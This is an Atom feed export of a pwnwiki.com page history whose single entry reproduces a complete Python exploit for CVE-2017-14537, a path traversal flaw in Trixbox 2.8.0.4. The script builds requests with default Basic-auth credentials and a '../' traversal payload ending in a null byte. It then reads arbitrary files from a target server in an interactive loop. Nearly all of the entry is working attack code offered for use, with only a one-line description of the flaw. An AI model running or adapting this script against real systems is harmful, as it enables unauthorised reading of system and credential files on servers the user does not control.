<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2017-14537 Trixbox 2.8.0.4 目錄遍歷漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T02:54:04Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=3601&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.word...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2017-14537_Trixbox_2.8.0.4_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=3601&amp;oldid=prev"/>
		<updated>2021-05-28T09:47:32Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Trixbox 2.8.0.4 - &amp;#039;lang&amp;#039; Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.word...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal&lt;br /&gt;
# Date: 27.05.2021&lt;br /&gt;
# Exploit Author: Ron Jost (Hacker5preme)&lt;br /&gt;
# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/&lt;br /&gt;
# Credits to: Sachin Wagh&lt;br /&gt;
# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download&lt;br /&gt;
# Version: 2.8.0.4&lt;br /&gt;
# Tested on: Xubuntu 20.04&lt;br /&gt;
# CVE: CVE-2017-14537&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Description:&lt;br /&gt;
trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the&lt;br /&gt;
lang parameter to /maint/modules/home/index.php.&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Import required modules:&lt;br /&gt;
'''&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import urllib.parse&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
User-Input:&lt;br /&gt;
'''&lt;br /&gt;
target_ip = sys.argv[1]&lt;br /&gt;
target_port = sys.argv[2]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Construct malicious request:&lt;br /&gt;
'''&lt;br /&gt;
# Constructing header:&lt;br /&gt;
header = {&lt;br /&gt;
    'Host': target_ip,&lt;br /&gt;
    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',&lt;br /&gt;
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',&lt;br /&gt;
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',&lt;br /&gt;
    'Accept-Encoding': 'gzip, deflate',&lt;br /&gt;
    'Connection': 'keep-alive',&lt;br /&gt;
    'Cookie': 'template=classic; lng=en; lng=en',&lt;br /&gt;
    'Upgrade-Insecure-Requests': '1',&lt;br /&gt;
    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
# Constructing malicious link (payload):&lt;br /&gt;
base_link = 'http://' + target_ip + ':' + target_port&lt;br /&gt;
base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'&lt;br /&gt;
base_link_addon_3 = '%00english'&lt;br /&gt;
print('')&lt;br /&gt;
base_link_addon_2 = input('Input the filepath or input EXIT: ')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
EXPLOIT:&lt;br /&gt;
'''&lt;br /&gt;
while base_link_addon_2 != 'EXIT':&lt;br /&gt;
    base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')&lt;br /&gt;
    exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3&lt;br /&gt;
    print('')&lt;br /&gt;
    exploit = requests.post(exploit_link, headers=header)&lt;br /&gt;
    print('Contents of ' + base_link_addon_2 + ':')&lt;br /&gt;
    for data in exploit.iter_lines():&lt;br /&gt;
        data = data.decode('utf-8')&lt;br /&gt;
        if data != '&amp;lt;!DOCTYPE HTML PUBLIC &amp;quot;-//W3C//DTD HTML 4.01 Transitional//EN&amp;quot;&amp;gt;':&lt;br /&gt;
            print(data)&lt;br /&gt;
        else:&lt;br /&gt;
            break&lt;br /&gt;
    print('')&lt;br /&gt;
    base_link_addon_2 = input('Input the filepath or input EXIT: ')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>